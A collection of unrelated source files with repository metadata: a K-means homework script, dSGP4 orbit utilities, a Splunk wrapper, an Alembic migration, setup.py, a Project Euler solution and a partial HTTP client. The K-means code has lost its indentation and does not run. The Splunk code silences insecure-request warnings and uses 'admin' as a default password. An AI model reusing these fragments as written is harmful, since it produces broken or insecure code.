#分群 K-means
model = KMeans(n_clusters = 16)
data = file.read_csv("./data.csv")
data.drop(['id'],axis=1)
predict = model.fit(data).labels_
ans = []
for row in predict:
ans.append(row)
test = file.read_csv("./test.csv")
test0 = test['0']
test1 = test['1']
#Output Ans
with open('output.csv', 'w') as f:
f.write("index,ans\n")
for i in range(len(test)):
if(ans[test0.iloc[i]] != ans[test1.iloc[i]]):
f.write(str(i) + "," + str(0) + "\n")
else:
f.write(str(i) + "," + str(1) + "\n")
| kiper00/DataMining | Hw2/Hw.py | Hw.py | py | 694 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sklearn.cluster.KMeans",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
}
] |
777182916 | import datetime
import numpy as np
import torch
def get_gravity_constants(gravity_constant_name):
if gravity_constant_name == 'wgs-72old':
mu = 398600.79964 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 0.0743669161
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name == 'wgs-72':
mu = 398600.8 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name=="wgs-84":
mu = 398600.5 # in km3 / s2
radiusearthkm = 6378.137 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.00108262998905
j3 = -0.00000253215306
j4 = -0.00000161098761
j3oj2 = j3 / j2
else:
raise RuntimeError("Supported gravity constant names: wgs-72, wgs-84, wgs-72old while "+gravity_constant_name+" was provided")
return torch.tensor(tumin), torch.tensor(mu), torch.tensor(radiusearthkm), torch.tensor(xke), torch.tensor(j2), torch.tensor(j3), torch.tensor(j4), torch.tensor(j3oj2)
def propagate(x, tle_sat, tsince, gravity_constant_name="wgs-84"):
    """
    This function takes a tensor of inputs and a TLE, and returns the corresponding state.
    It can be used to take the gradient of the state w.r.t. the inputs.

    Args:
        - x (``torch.tensor``): input of tensors, with the following values (x[0:9] have the same units as the ones in the TLE):
            - x[0]: bstar
            - x[1]: ndot
            - x[2]: nddot
            - x[3]: ecco
            - x[4]: argpo
            - x[5]: inclo
            - x[6]: mo
            - x[7]: kozai
            - x[8]: nodeo
        - tle_sat (``dsgp4.tle.TLE``): TLE object to be propagated
        - tsince (``float``): propagation time in minutes
        - gravity_constant_name (``str``): gravity model passed to
          get_gravity_constants (default "wgs-84")

    Returns:
        - state (``torch.tensor``): (2x3) tensor representing position and velocity in km and km/s.
    """
    # Local imports avoid a circular dependency between this module and the
    # sgp4/sgp4init modules of the package.
    from .sgp4init import sgp4init
    from .sgp4 import sgp4
    whichconst=get_gravity_constants(gravity_constant_name)
    # NOTE(review): sgp4init appears to initialize `tle_sat` in place with the
    # elements taken from x before propagation — confirm against dsgp4.sgp4init.
    sgp4init(whichconst=whichconst,
            opsmode='i',
            satn=tle_sat.satellite_catalog_number,
            epoch=(tle_sat._jdsatepoch+tle_sat._jdsatepochF)-2433281.5,
            xbstar=x[0],
            xndot=x[1],
            xnddot=x[2],
            xecco=x[3],
            xargpo=x[4],
            xinclo=x[5],
            xmo=x[6],
            xno_kozai=x[7],
            xnodeo=x[8],
            satellite=tle_sat)
    # Propagate by tsince minutes (sgp4 expects a tensor time argument).
    state=sgp4(tle_sat, tsince*torch.ones(1,1))
    return state
def from_year_day_to_date(y, d):
    """Convert a year and a 1-based day-of-year into a datetime (day 1 -> Jan 1)."""
    jan_first = datetime.datetime(y, 1, 1)
    return jan_first + datetime.timedelta(d - 1)
def gstime(jdut1):
    """Greenwich sidereal time, in radians wrapped to [0, 2*pi).

    `jdut1` is a torch tensor of Julian dates (UT1); the result has the
    same shape.
    """
    deg2rad = np.pi / 180.  # kept for parity with the reference implementation
    # Julian centuries since the J2000 epoch.
    tut1 = (jdut1 - 2451545.0) / 36525.0
    # Third-order polynomial giving GST in seconds of time.
    gst_sec = -6.2e-6 * tut1 * tut1 * tut1 + 0.093104 * tut1 * tut1 + \
        (876600.0 * 3600 + 8640184.812866) * tut1 + 67310.54841
    # 360 deg / 86400 s = 1/240 deg per second; convert to radians and wrap.
    gst = (gst_sec * (np.pi / 180.0) / 240.0) % (2 * np.pi)
    # ------------------------ check quadrants ---------------------
    gst = torch.where(gst < 0., gst + (2 * np.pi), gst)
    return gst
def clone_w_grad(y):
    """Return a detached copy of tensor `y` with requires_grad enabled (a fresh autograd leaf)."""
    detached_copy = y.clone().detach()
    return detached_copy.requires_grad_(True)
def jday(year, mon, day, hr, minute, sec):
    """
    Convert a calendar date and UT time to a Julian Date, returned as a pair
    whose sum is the Julian Date (days since noon on January 1st, 4713 BC).

    Args:
        year (`int`): year
        mon (`int`): month
        day (`int`): day
        hr (`int`): hour
        minute (`int`): minute
        sec (`float`): second

    Returns:
        `tuple`: (day part of the Julian Date, fraction-of-day part)
    """
    whole = (367.0 * year
             - 7.0 * (year + ((mon + 9.0) // 12.0)) * 0.25 // 1.0
             + 275.0 * mon // 9.0
             + day + 1721013.5)
    fraction = (sec + minute * 60.0 + hr * 3600.0) / 86400.0
    return whole, fraction
def invjday(jd):
    """
    Convert a Julian Date back to a calendar date and UT time.

    Args:
        jd (`float`): Julian Date

    Returns:
        `tuple`: (year, month, day, hour, minute, second)
    """
    # Days elapsed since the 1900 reference epoch (JD 2415019.5).
    elapsed = jd - 2415019.5
    years = elapsed / 365.25
    year = 1900 + int(years // 1.0)
    leap_days = int(((year - 1901) * 0.25) // 1.0)
    # Tiny epsilon keeps floating-point results from landing just below a day boundary.
    days = elapsed - ((year - 1900) * 365.0 + leap_days) + 0.00000000001
    if (days < 1.0):
        # Rolled back across a year boundary: redo with the previous year.
        year = year - 1
        leap_days = int(((year - 1901) * 0.25) // 1.0)
        days = elapsed - ((year - 1900) * 365.0 + leap_days)
    mon, day, hr, minute, sec = days2mdhms(year, days)
    # Undo (most of) the epsilon added above.
    sec = sec - 0.00000086400
    return year, mon, day, hr, minute, sec
def days2mdhms(year, fractional_day):
    """
    Expand a 1-based fractional day-of-year into month, day, hour, minute, second.

    Args:
        year (`int`): year the day count refers to
        fractional_day (`float`): day of year, where 1.0 means Jan 1 00:00

    Returns:
        `tuple`: (month, day, hour, minute, second) with fractional seconds
    """
    moment = datetime.datetime(year - 1, 12, 31) + datetime.timedelta(days=fractional_day)
    seconds = moment.second + moment.microsecond / 1e6
    return moment.month, moment.day, moment.hour, moment.minute, seconds
def from_string_to_datetime(string):
    """
    Parse a 'YYYY-MM-DD HH:MM:SS[.ffffff]' string into a datetime.

    Args:
        string (`str`): string to convert

    Returns:
        `datetime.datetime`: parsed datetime object
    """
    # Pick the format with or without fractional seconds based on the dot.
    fmt = '%Y-%m-%d %H:%M:%S.%f' if '.' in string else '%Y-%m-%d %H:%M:%S'
    return datetime.datetime.strptime(string, fmt)
def from_mjd_to_epoch_days_after_1_jan(mjd_date):
    """
    Convert a Modified Julian Date into the fractional day-of-year count used
    by TLE epochs, i.e. days since Dec 31 of the previous year (Jan 1 -> 1.x).

    Args:
        mjd_date (`float`): Modified Julian Date

    Returns:
        `float`: fractional day of year
    """
    moment = from_mjd_to_datetime(mjd_date)
    since_new_year = moment - datetime.datetime(moment.year - 1, 12, 31)
    fraction = (since_new_year.seconds + since_new_year.microseconds / 1e6) / (60 * 60 * 24)
    return since_new_year.days + fraction
def from_mjd_to_datetime(mjd_date):
    """
    Convert a Modified Julian Date (days since 1858-11-17 00:00) to a datetime.

    Args:
        mjd_date (`float`): Modified Julian Date

    Returns:
        `datetime.datetime`: datetime object
    """
    # MJD and JD differ by a fixed offset of 2400000.5 days.
    return from_jd_to_datetime(mjd_date + 2400000.5)
def from_jd_to_datetime(jd_date):
    """
    Convert a Julian Date (days since noon on January 1st, 4713 BC) to a datetime.

    Args:
        jd_date (`float`): Julian Date

    Returns:
        `datetime.datetime`: datetime object
    """
    year, month, day, hour, minute, seconds = invjday(jd_date)
    # Build the datetime with second=0 first, then add the possibly-fractional
    # seconds as a timedelta so sub-second precision is preserved.
    whole = datetime.datetime(year=int(year), month=int(month), day=int(day),
                              hour=int(hour), minute=int(minute), second=0)
    return whole + datetime.timedelta(seconds=seconds)
def get_non_empty_lines(lines):
    """
    Split a multi-line string and return only its non-blank lines.

    Args:
        lines (`str`): the text to split (despite the name, a single string)

    Returns:
        `list`: lines containing at least one non-whitespace character

    Raises:
        ValueError: if `lines` is not a string
    """
    if not isinstance(lines, str):
        raise ValueError('Expecting a string')
    return [line for line in lines.splitlines() if line.strip()]
def from_datetime_to_fractional_day(datetime_object):
    """
    Convert a datetime to its 1-based fractional day of year: Jan 1 00:00 -> 1.0,
    Jan 1 12:00 -> 1.5, and so on.

    Args:
        datetime_object (`datetime.datetime`): datetime object to convert

    Returns:
        `float`: fractional day of year
    """
    delta = datetime_object - datetime.datetime(datetime_object.year - 1, 12, 31)
    return delta.days + delta.seconds/60./60./24 + delta.microseconds/60./60./24./1e6
def from_datetime_to_mjd(datetime_obj):
    """
    Convert a datetime to a Modified Julian Date (days since 1858-11-17 00:00).

    Args:
        datetime_obj (`datetime.datetime`): datetime object to convert

    Returns:
        `float`: Modified Julian Date
    """
    # MJD is the Julian Date shifted by a constant 2400000.5 days.
    return from_datetime_to_jd(datetime_obj) - 2400000.5
def from_datetime_to_jd(datetime_obj):
    """
    Convert a datetime object to a Julian Date (days since noon on January 1, 4713 BC).

    Args:
        datetime_obj (`datetime.datetime`): datetime object to convert

    Returns:
        `float`: Julian Date
    """
    # BUG FIX: the original built fractional seconds as
    # float('0.' + str(datetime_obj.microsecond)), which is only correct when
    # the microsecond value happens to have six digits (e.g. 500 us became
    # 0.5 s). Dividing by 1e6 is correct for every value.
    sec = datetime_obj.second + datetime_obj.microsecond / 1e6
    return sum(jday(year=datetime_obj.year, mon=datetime_obj.month,
                    day=datetime_obj.day, hr=datetime_obj.hour,
                    minute=datetime_obj.minute, sec=sec))
def from_cartesian_to_tle_elements(state, gravity_constant_name='wgs-72'):
    """
    This function converts the provided state from Cartesian to TLE elements.

    Args:
        state (`np.ndarray`): 2x3 state to convert (position row, velocity row, SI units)
        gravity_constant_name (`str`): name of the central body (default: 'wgs-72')

    Returns:
        dict: TLE-style elements with keys 'mean_motion' [rad/s], 'eccentricity',
        'inclination', 'raan', 'argument_of_perigee', 'mean_anomaly' (angles in radians)
    """
    _,mu_earth,_,_,_,_,_,_=get_gravity_constants(gravity_constant_name)
    # Gravity constants are in km^3/s^2; convert to m^3/s^2 for the SI state.
    mu_earth=float(mu_earth)*1e9
    kepl_el = from_cartesian_to_keplerian(state, mu_earth)
    tle_elements={}
    # Mean motion n = sqrt(mu / a^3) from the semi-major axis kepl_el[0].
    tle_elements['mean_motion'] = np.sqrt(mu_earth/((kepl_el[0])**(3.0)))
    tle_elements['eccentricity'] = kepl_el[1]
    tle_elements['inclination'] = kepl_el[2]
    tle_elements['raan'] = kepl_el[3]
    tle_elements['argument_of_perigee'] = kepl_el[4]
    # NOTE(review): kepl_el[5] is already the mean anomaly returned by
    # from_cartesian_to_keplerian; subtracting e*sin(...) again looks like a
    # second Kepler-equation step applied to a mean anomaly — confirm whether
    # kepl_el[5] was intended to be the eccentric anomaly here.
    mean_anomaly = kepl_el[5] - kepl_el[1]*np.sin(kepl_el[5])
    tle_elements['mean_anomaly'] = mean_anomaly%(2*np.pi)
    return tle_elements
def from_cartesian_to_keplerian(state, mu):
    """
    Convert a Cartesian state into classical Keplerian elements.

    Args:
        state (`np.array`): 2x3 array; row 0 is position, row 1 velocity (SI units).
        mu (`float`): gravitational parameter of the central body

    Returns:
        `np.array`: (a, e, i, Omega, omega, mean_anomaly) — semi-major axis,
        eccentricity, inclination, RAAN, argument of perigee and mean anomaly.
        Angles are in radians and wrapped into [0, 2*pi); a is in SI units.
    """
    pos = np.array([state[0, 0], state[0, 1], state[0, 2]])
    vel = np.array([state[1, 0], state[1, 1], state[1, 2]])
    ang_mom = np.cross(pos, vel)
    ang_mom_norm = np.linalg.norm(ang_mom)
    r = np.linalg.norm(pos)
    v = np.linalg.norm(vel)
    # Vis-viva: specific orbital energy fixes the semi-major axis.
    specific_energy = 0.5 * (v ** 2) - mu / r
    a = -mu / (2 * specific_energy)
    e = np.sqrt(1 - (ang_mom_norm ** 2) / (a * mu))
    i = np.arccos(ang_mom[2] / ang_mom_norm)
    Omega = np.arctan2(ang_mom[0], -ang_mom[1])
    # Argument of latitude from the position's z-component.
    lat = np.arctan2(np.divide(state[0, 2], (np.sin(i))),
                     (state[0, 0] * np.cos(Omega) + state[0, 1] * np.sin(Omega)))
    p = a * (1 - e ** 2)
    nu = np.arctan2(np.sqrt(p / mu) * np.dot(pos, vel), p - r)
    omega = lat - nu
    ecc_anomaly = 2 * np.arctan(np.sqrt((1 - e) / (1 + e)) * np.tan(nu / 2))
    # Kepler's equation: M = E - e*sin(E).
    mean_anomaly = ecc_anomaly - e * np.sin(ecc_anomaly)
    # Wrap the three angles into [0, 2*pi).
    if mean_anomaly < 0:
        mean_anomaly = 2 * np.pi - abs(mean_anomaly)
    if omega < 0:
        omega = 2 * np.pi - abs(omega)
    if Omega < 0:
        Omega = 2 * np.pi - abs(Omega)
    if abs(mean_anomaly) > 2 * np.pi:
        mean_anomaly = mean_anomaly % (2 * np.pi)
    if abs(omega) > 2 * np.pi:
        omega = omega % (2 * np.pi)
    if abs(Omega) > 2 * np.pi:
        Omega = Omega % (2 * np.pi)
    return np.array([a, e, i, Omega, omega, mean_anomaly])
def from_cartesian_to_keplerian_torch(state, mu):
    """
    Torch counterpart of from_cartesian_to_keplerian.

    Args:
        state (`torch.tensor`): 2x3 tensor; row 0 is position, row 1 velocity (SI units).
        mu (`float`): gravitational parameter of the central body

    Returns:
        `list`: [no_kozai, e, i, Omega, omega, mean_anomaly], where no_kozai is
        the mean motion expressed in the units used by TLEs. Angles are in
        radians; unlike the numpy version, they are NOT wrapped into [0, 2*pi).
    """
    ang_mom = torch.cross(state[0], state[1])
    ang_mom_norm = ang_mom.norm()
    r = state[0].norm()
    v = torch.norm(state[1])
    # Vis-viva: specific orbital energy fixes the semi-major axis.
    specific_energy = 0.5 * (v ** 2) - mu / r
    a = -mu / (2 * specific_energy)
    e = torch.sqrt(1 - (ang_mom_norm ** 2) / (a * mu))
    i = torch.arccos(ang_mom[2] / ang_mom_norm)
    Omega = torch.arctan2(ang_mom[0], -ang_mom[1])
    lat = torch.arctan2(torch.divide(state[0, 2], (torch.sin(i))),
                        (state[0, 0] * torch.cos(Omega) + state[0, 1] * torch.sin(Omega)))
    p = a * (1 - e ** 2)
    nu = torch.arctan2(torch.sqrt(p / mu) * torch.dot(state[0], state[1]), p - r)
    omega = lat - nu
    ecc_anomaly = 2 * torch.arctan(torch.sqrt((1 - e) / (1 + e)) * torch.tan(nu / 2))
    # Kepler's equation: M = E - e*sin(E).
    mean_anomaly = ecc_anomaly - e * torch.sin(ecc_anomaly)
    # Convert the mean motion into the "no_kozai" units used in TLEs
    # (xpdotp = 1440 / (2*pi) revs-per-day factor).
    mean_motion = torch.sqrt(mu / ((a) ** (3.0)))
    no_kozai_conversion_factor = (1440.0 / (2.0 * np.pi)) / 43200.0 * np.pi
    no_kozai = mean_motion / no_kozai_conversion_factor
    return [no_kozai, e, i, Omega, omega, mean_anomaly]
| esa/dSGP4 | dsgp4/util.py | util.py | py | 14,817 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "numpy.sqrt",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sgp4init.sgp4init",
"line_numb... |
8257193173 | import logging
from typing import Mapping
from datetime import datetime
import attr
from .dixel import Dixel
from ..utils import Pattern, DatetimeInterval, gateway
from ..utils.dicom import DicomLevel
# splunk-sdk is 2.7 only, so diana.utils.gateway provides a minimal query/put replacement
# Suppress insecure warning
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@attr.s
class Splunk(Pattern):
    """Pattern wrapper around a Splunk service: queries events via the REST
    gateway and submits events through an HTTP Event Collector (HEC)."""
    host = attr.ib( default="localhost" )
    port = attr.ib( default="8000" )
    user = attr.ib( default="splunk" )
    protocol = attr.ib( default="http" )
    password = attr.ib( default="admin" )
    hec_protocol = attr.ib( default="http" )
    hec_port = attr.ib( default="8088" )
    gateway = attr.ib( init=False )
    hec_tokens = attr.ib( factory=dict ) # Mapping of domain name -> token
    default_token = attr.ib( default=None )
    default_index = attr.ib( default='main' )

    # attrs default factory: builds the gateway lazily at instance creation.
    @gateway.default
    def connect(self):
        # Create a Service instance and log in
        return gateway.Splunk(
            host=self.host,
            port=self.port,
            protocol = self.protocol,
            hec_port=self.hec_port,
            hec_protocol=self.hec_protocol,
            user=self.user,
            password=self.password
        )

    def add_hec_token(self, name: str, token: str):
        # Register a named HEC token for later lookup in put().
        self.hec_tokens[name] = token

    def find_items(self,
                   query: Mapping,
                   time_interval: DatetimeInterval=None):
        # Run a Splunk event search; returns a set of Dixels, or None when the
        # search produced no results (note: no empty-set return on miss).
        results = self.gateway.find_events(query, time_interval)
        # logging.debug("Splunk query: {}".format(query))
        # logging.debug("Splunk results: {}".format(results))
        if results:
            worklist = set()
            for d in results:
                worklist.add( Dixel(meta=d, level=DicomLevel.of( d['level'] ) ) )
            # logging.debug(worklist)
            return worklist

    def put(self, item: Dixel, host: str, token: str, index: str=None ):
        # Submit one Dixel's metadata as a Splunk event via the HEC endpoint.
        logging.debug("Putting in Splunk")

        # Prefer the most specific timestamp available on the item.
        if item.meta.get('InstanceCreationDateTime'):
            timestamp = item.meta.get('InstanceCreationDateTime')
        elif item.meta.get('StudyDateTime'):
            timestamp = item.meta.get('StudyDateTime')
        else:
            logging.warning("Failed to get inline 'DateTime', using now()")
            timestamp = datetime.now()

        event = item.meta
        event['level'] = str(item.level)
        event['oid'] = item.oid()

        # Fall back to the configured defaults when token/index are omitted.
        if not token:
            token=self.default_token
        _token = self.hec_tokens.get(token)
        if not index:
            index=self.default_index

        self.logger.debug(timestamp)
        self.logger.debug(event)
        self.logger.debug(index)
        self.logger.debug(_token)

        # NOTE(review): self.hostname is not defined in this class — presumably
        # provided by the Pattern base class; confirm.
        _host = "{}@{}".format(host, self.hostname)

        # at $time $event was reported by $host for $index with credentials $auth
        self.gateway.put_event( timestamp=timestamp, event=event, host=_host, index=index, token=_token )

    # Real auth description
    # headers = {'Authorization': 'Splunk {0}'.format(self.hec_tok[hec])}
| derekmerck/DIANA | packages/diana/diana/apis/splunk.py | splunk.py | py | 3,138 | python | en | code | 11 | github-code | 6 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib3.exceptions",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "utils.Pattern",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "attr.i... |
27055792799 | """empty message
Revision ID: 22771e69d10c
Revises: 8c7cbf0f76c6
Create Date: 2021-07-14 18:46:48.994109
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "22771e69d10c"
down_revision = "8c7cbf0f76c6"
branch_labels = None
depends_on = None
def upgrade():
    """Fold participant GitHub info into the user table.

    Renames user.username -> user.github_username, adds contact/profile
    columns to user, and renames participant.github -> github_username
    (dropping its unique constraint and server default).
    """
    # Unique constraint must go before the column it covers is renamed.
    op.drop_constraint("participant_github_key", "participant", type_="unique")
    op.alter_column(
        "user", "username", existing_nullable=False, new_column_name="github_username"
    )
    op.add_column("user", sa.Column("first_name", sa.String(length=50), nullable=True))
    op.add_column("user", sa.Column("last_name", sa.String(length=50), nullable=True))
    op.add_column("user", sa.Column("email", sa.String(length=200), nullable=True))
    op.add_column("user", sa.Column("phone", sa.String(length=13), nullable=True))
    op.add_column("user", sa.Column("slack", sa.String(length=21), nullable=True))
    op.add_column("user", sa.Column("is_admin", sa.Boolean(), nullable=True))
    # Autogenerated (unnamed) unique constraint on the renamed column.
    op.create_unique_constraint(None, "user", ["github_username"])
    op.alter_column(
        "participant",
        "github",
        nullable=False,
        new_column_name="github_username",
        server_default=None,
    )
def downgrade():
    """Reverse upgrade(): restore the original user/participant column names,
    drop the added profile columns, and recreate the old unique constraint."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_constraint(None, "user", type_="unique")
    op.create_unique_constraint("user_username_key", "user", ["username"])
    op.drop_column("user", "is_admin")
    op.drop_column("user", "slack")
    op.drop_column("user", "phone")
    op.drop_column("user", "email")
    op.drop_column("user", "last_name")
    op.drop_column("user", "first_name")
    op.drop_constraint(None, "participant", type_="unique")
    op.alter_column(
        "user", "github_username", nullable=False, new_column_name="username"
    )
    op.alter_column(
        "participant",
        "github_username",
        existing_nullable=False,
        new_column_name="github",
    )
    # ### end Alembic commands ###
| CodeForPoznan/codeforpoznan.pl_v3 | backend/migrations/versions/22771e69d10c_.py | 22771e69d10c_.py | py | 2,028 | python | en | code | 8 | github-code | 6 | [
{
"api_name": "alembic.op.drop_constraint",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "alembic.op.alter_column",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "alembic... |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Packaging/setup script for the pwbs (PAiP Web Build System) package."""
# Imports
import io
from setuptools import setup, find_packages
# Readme file (long-description source)
with io.open('README.rst', encoding='utf-8') as readme_file:
    readme = readme_file.read()
# ChangeLog file (appended to the long description)
with io.open('HISTORY.rst', encoding='utf-8') as history_file:
    history = history_file.read()
# Requirements Variable
requirements: list = [
    # Package Requirements
    'sentry_sdk',
    'pytest',
]
# Setup Requirements Variable
setup_requirements: list = [
    # Setup Requirements
]
# Test Requirements Variable
test_requirements: list = [
    # Test Requirements
    'pylint',
    'pytest',
    'coverage'
]
setup(
    # Name of Package
    name='pwbs',
    # Version following SemVer Style
    # NOTE(review): '0.5.0-dev2' is not PEP 440-normalized ('0.5.0.dev2');
    # newer setuptools versions warn on or reject such versions — confirm.
    version='0.5.0-dev2',
    # Description of the Package
    description='PWBS is Build System for easy automation process.',
    # Description of the Package to show on PyPi (Longer Description)
    long_description=readme + '\n\n' + history,
    # The Project Mainpage [For that project for now is just repository]
    url='https://gitlab.com/paip-web/pwbs',
    # Author Details
    author='Patryk Adamczyk',
    author_email='patrykadamczyk@paipweb.com',
    # License
    license='MIT',
    # Classifiers of the Project
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        # 'Development Status :: 1 - Planning'
        # 'Development Status :: 2 - Pre-Alpha'
        # 'Development Status :: 3 - Alpha'
        # 'Development Status :: 4 - Beta'
        # 'Development Status :: 5 - Production/Stable'
        # 'Development Status :: 6 - Mature'
        # 'Development Status :: 7 - Inactive'
        'Development Status :: 2 - Pre-Alpha',
        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        # Topic
        'Topic :: Software Development',
        'Topic :: Software Development :: Build Tools',
        'Topic :: Utilities',
        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: MIT License',
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3 :: Only',
        'Operating System :: OS Independent',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: Microsoft :: Windows :: Windows 7',
        'Operating System :: Microsoft :: Windows :: Windows 10',
        'Operating System :: POSIX :: Linux',
        'Environment :: Console'
    ],
    # Keywords of your Project
    keywords='development build tools task runner',
    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    # packages=["pwbs"],
    # packages=find_packages(exclude=['docs', 'tests*']),
    # Alternatively, if you want to distribute just a my_module.py, uncomment
    # this:
    #   py_modules=["my_module"],
    # Dependencies of the Project
    install_requires=requirements,
    tests_require=test_requirements,
    setup_requires=setup_requirements,
    # List additional groups of dependencies here (e.g. development
    # dependencies). You can install these using the following syntax,
    # for example:
    # $ pip install -e .[dev,test]
    extras_require={
        'setup': ["wheel", "twine", "collective.checkdocs"],
        'test': ['pylint', 'pytest', 'coverage'],
    },
    # If there are data files included in your packages that need to be
    # installed, specify them here.  If using Python 2.6 or less, then these
    # have to be included in MANIFEST.in as well.
    # package_data={
    #     'sample': ['package_data.dat'],
    # },
    # Although 'package_data' is the preferred approach, in some case you may
    # need to place data files outside of your packages. See:
    # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
    # In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
    # data_files=[('my_data', ['data/data_file'])],
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': [
            'pwbs=pwbs:main',
        ],
    },
    # Python Required Version for the package
    python_requires='~=3.6',
)
| paip-web/pwbs | setup.py | setup.py | py | 4,954 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "io.open",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line... |
42519865803 | # The radical of n, rad(n), is the product of distinct prime factors of n. For
# example, 504 = 2^3 x 3^2 x 7, so rad(504) = 2 x 3 x 7 = 42.
#
# We shall define the triplet of positive integers (a, b, c) to be an abc-hit if:
# GCD(a, b) = GCD(a, c) = GCD(b, c) = 1
# a < b
# a + b = c
# rad(abc) < c
# For example, (5, 27, 32) is an abc-hit, because:
# GCD(5, 27) = GCD(5, 32) = GCD(27, 32) = 1
# 5 < 27
# 5 + 27 = 32
# rad(4320) = 30 < 32
# It turns out that abc-hits are quite rare and there are only thirty-one abc
# hits for c < 1000, with sum(c) = 12523.
#
# Find sum(c) for c < 120000.
from fractions import gcd
from euler.utils import Utils
u = Utils()
def hit(a, b, c, rad):
    """Return True when (a, b, c) passes the abc-hit radical test:
    gcd(b, c) == 1 and rad(a)*rad(b)*rad(c) < c, with `rad` a lookup table."""
    coprime = gcd(b, c) == 1
    small_radical = rad[a] * rad[b] * rad[c] < c
    return coprime and small_radical
def rad(n, primes):
    """
    Build the table of radicals rad(k) for all k < n using dynamic programming
    and a precalculated collection of primes. rad(k) is the product of the
    distinct prime factors of k (with rad(1) = 1 and index 0 as a placeholder).
    """
    table = [0, 1]
    for value in range(2, n):
        if value in primes:
            table.append(value)
            continue
        remainder = value
        for p in primes:
            if remainder % p != 0:
                continue
            # Strip every power of p, then reuse the already-computed radical
            # of the remaining cofactor.
            while remainder % p == 0:
                remainder /= p
            if remainder < len(table):
                table.append(p * table[int(remainder)])
                break
    return table
def p127(max_c, exp):
    """Sum c over all abc-hits with c < max_c, restricting candidates to
    numbers whose radical is at most max_c**exp (a heuristic pruning)."""
    # u.sieve(max_c) presumably returns the primes below max_c
    # (euler.utils helper) -- confirm.
    primes = u.sieve(max_c)
    radicals = rad(int(max_c), primes)
    # Only numbers with a small radical can participate in a hit.
    possible_ys = [i for i in range(1, max_c) if radicals[i] <= int(max_c ** exp)]
    possible_rads = [radicals[i] for i in possible_ys]
    print("len(radicals):", len(radicals))
    print("len(possible_ys):", len(possible_ys))
    print(possible_ys)
    print(possible_rads)
    total = 0
    # Test every ordered candidate pair (a < b) with c = a + b < max_c.
    for a in possible_ys:
        for b in possible_ys:
            c = a + b
            if a < b and c < max_c and hit(a, b, c, radicals):
                print(a,b,c)
                total += c
    return total
print(p127(120000, 0.8)) | jose-ramirez/project_euler | problems/p127.py | p127.py | py | 2,025 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "euler.utils.Utils",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 26,
"usage_type": "call"
}
] |
import socket ##required
import argparse ##gets argument from command line
import sys ##system calls
import re ## parsing string

# Minimal curl-like HTTP/1.1 GET client: parses a URL from argv, fetches the
# page, writes the body to HTTPoutput.html and appends a summary to Log.csv.

BUFF_SIZE = 4096
TIMEOUT_SIZE = 2

neededInfo = { #contains everything that i need in my log
    'url':None,
    'sName':None,   # server host name
    'sIp':None,     # server IP
    'sPort':None,   # server port
    'Path':None,    # request path
    'cIp':None,     # client (local) IP
    'cPort':None,   # client (local) port
    'msg':None,     # raw response header
    'html_msg':None # response body
}

parser = argparse.ArgumentParser(description='Getting the HTTP request input')
parser.add_argument('input', type=str, help='User input', nargs='+')
cmd_input = parser.parse_args().input
url = cmd_input[0]

# Parse with an explicit scheme first; fall back to a scheme-less pattern.
http_exists = True
parsed = re.search(r"(?P<http>https*)://?(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
if parsed == None:
    http_exists = False
    parsed = re.search(r"(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)

# regex checking if host / domain / ip exist in the input
check_host = re.findall("[a-z]+\.\w+\.[a-z]+", url)
check_domain = re.findall("([a-zA-Z0-9]+\.[a-z]+)", url)
